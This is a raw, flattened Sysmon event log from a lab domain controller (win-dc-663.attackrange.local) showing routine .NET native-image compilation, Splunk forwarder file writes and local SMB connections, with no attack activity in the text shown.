AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GNXQMK8O2T\Microsoft.Windows.ServerManager.RemoteAccess.Plugin.ni.dllMD5=34DBA76A1B73F25F28125B1635B6538B,SHA256=EA4AB56BADC2DD99C9543F8D13DF3310CD4945C01874CFDA238038B6AC8F6075,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023280Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.292{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9705-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023279Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.277{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9705-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023278Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.277{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9705-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.277{4DB9351A-A27C-60D3-9605-00000000CF01}6748NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M4IEYWO35Z\Microsoft.Windows.ServerManager.PrintingServer.Plugin.ni.dll.auxMD5=A1D21C8210A690DA511F0B3DC61AB6EF,SHA256=287191966D2276B15B445397132009B47F3E4E27655A9502E09831ADFC80885A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.261{4DB9351A-A27C-60D3-9605-00000000CF01}6748NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M4IEYWO35Z\Microsoft.Windows.ServerManager.PrintingServer.Plugin.ni.dllMD5=2AD2EE17079DCE99E592B23AA2DC75EC,SHA256=89C4CDD9FFD30AA363A0CFCBC1A7E06AED80B9BFC3BE167950B68F75E4C18B7F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:08.246{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9605-00000000CF01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.230{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9605-00000000CF01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:08.230{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9605-00000000CF01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.230{4DB9351A-A27C-60D3-9505-00000000CF01}2612NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QPPN5UXTV5\Microsoft.Windows.ServerManager.PowerShell.ni.dll.auxMD5=09FF5B70DA69DA5F851CCE5F083EAD81,SHA256=E19F2DA5295B8621B1D36879C0089179139C63E4EFFDC633843E1A9ECFBB284B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.230{4DB9351A-A27C-60D3-9505-00000000CF01}2612NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QPPN5UXTV5\Microsoft.Windows.ServerManager.PowerShell.ni.dllMD5=37EA091A23A68C8D31190ED23EE90072,SHA256=B7C58CC32BB7FF0B62F7AC5ABAD4DCB9D1102CA585A67295A5AF13B573B2F682,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.199{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9505-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.199{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFDE73DD564F9FAE9E7A16B502C479D8,SHA256=10EC9479ABE54885FF3578F42F169E03E6847C72DEDAE03CD19F8FFF594B13D4,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.199{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3434CB68613F6B82E7207A5A8758F920,SHA256=39D817DF3C9F21F2EC746E7788773F4C901FB5D5A9C919399F32891D2174D11F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.183{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9505-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:08.183{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9505-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.183{4DB9351A-A27B-60D3-9405-00000000CF01}6956NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I5G8ENQIFZ\Microsoft.Windows.ServerManager.Plugins.Ipam.ni.dll.auxMD5=684B522C679E7490A12E601687A3B47A,SHA256=61974EDBEB9B6628BD34840071A55B82C4FE02A03CEE6F9A1BCA36AB71920715,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.183{4DB9351A-A27B-60D3-9405-00000000CF01}6956NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I5G8ENQIFZ\Microsoft.Windows.ServerManager.Plugins.Ipam.ni.dllMD5=CC2677F7176569429A96B8A8AF0410DF,SHA256=2E9A48736534389F55016D3486111F572CFA66E39E736670F7285DF38A7041D3,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000023397Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.677{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61461-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000023396Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.677{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61461-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 10341000x800000000000000023395Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.980{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-AD05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023394Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:09.980{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-AD05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023393Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.964{4DB9351A-A27D-60D3-AC05-00000000CF01}6892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TGXVQJ37UP\PresentationFramework-SystemXmlLinq.ni.dll.auxMD5=341CF977C6672F9692797FBF252E7C84,SHA256=9864BFEC9DF71B3DDEB2F063AE3E0BA27D7F225034C715B565471566062DBF55,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023392Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.964{4DB9351A-A27D-60D3-AC05-00000000CF01}6892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TGXVQJ37UP\PresentationFramework-SystemXmlLinq.ni.dllMD5=EAB8CF355A8F95AA73B9FF0080D90E30,SHA256=DB209E9F3560DF21FF154CFFCE9D13D218D47186E378AAE576C808B49AC94834,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023391Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.949{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-AC05-00000000CF01}6892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023390Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.933{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-AC05-00000000CF01}6892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023389Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:09.933{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-AC05-00000000CF01}6892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023388Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.933{4DB9351A-A27D-60D3-AB05-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CQKWG7TL9J\PresentationFramework-SystemXml.ni.dll.auxMD5=90BBB06566C0D50A0D0BA31232C9EC70,SHA256=7ED2478021663F6DC46DFEB252B4B1B1C10712021A6DB2FA1DF7DEC8572031FF,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023387Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.933{4DB9351A-A27D-60D3-AB05-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CQKWG7TL9J\PresentationFramework-SystemXml.ni.dllMD5=09C77E565653340DF8781687B2BFC9C5,SHA256=FAADEB60AA4EF54BFE5B232902665673A07AA44CD6F14E842C3CAF34BFB16EB6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023386Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.902{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-AB05-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023385Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.886{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-AB05-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023384Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:09.886{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-AB05-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319